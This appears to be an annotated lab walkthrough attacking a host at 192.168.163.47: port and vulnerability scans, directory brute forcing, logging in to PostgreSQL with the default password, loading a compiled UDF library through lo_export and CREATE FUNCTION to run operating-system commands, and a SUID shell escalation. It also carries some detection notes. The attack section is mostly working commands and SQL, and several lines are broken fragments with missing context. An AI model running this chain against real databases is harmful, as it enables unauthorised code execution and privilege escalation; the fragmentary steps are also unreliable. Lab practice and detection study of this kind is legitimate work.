# Enumeration of the lab host 192.168.163.47.
# nmapAutomator is run twice against the same address: once with scan type
# "full" and once with scan type "vulns".
nmapAutomator.sh -H 192.168.163.47 -t full
nmapAutomator.sh -H 192.168.163.47 -t vulns
# Directory brute force of the web root with a medium wordlist, also trying
# the .txt and .html extensions. -k (skip TLS verification) has no effect on
# a plain http:// URL. With 50 threads this shows up in the web server's
# access log as a dense burst of 404 responses from a single source address.
gobuster dir -u http://192.168.163.47/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -x .txt,.html --threads 50
postgres. Trying the password postgres, we authenticate successfully.
gcc lib_postgresqludf_sys.c -I server -fPIC -shared -o udf64.so
.psql
payload: u.psql
with 16385.
psql -h 192.168.163.47 -p 5437 -U postgres -d postgres -f u.psql
-- Post-authentication steps run as the postgres role.
-- lo_export() is a server-side function: it writes large object 16385 to a
-- path on the database server's own filesystem (here /tmp/exploit.so). It is
-- restricted to superusers by default.
select lo_export(16385, '/tmp/exploit.so');
-- Registers a C-language function named exec, bound to the symbol sys_eval in
-- the exported file. Creating LANGUAGE C functions requires superuser rights,
-- so this depends on the postgres login having been accepted.
-- Detection: CREATE FUNCTION ... LANGUAGE C pointing at a library outside the
-- PostgreSQL library directory (especially under /tmp) is a high-signal event
-- in statement or audit logs; log_statement = 'ddl' is enough to record it.
create or replace function exec(char) returns char as '/tmp/exploit.so','sys_eval' language c strict;
-- Calls the new function with a command string; the text it returns comes
-- back as the query result. NOTE(review): sys_eval presumably runs the string
-- as an OS command under the database service account -- confirm against the
-- library source, which is not shown here.
select exec('which python');
find binary has the SUID bit set.
/bin/sh
with elevated privileges.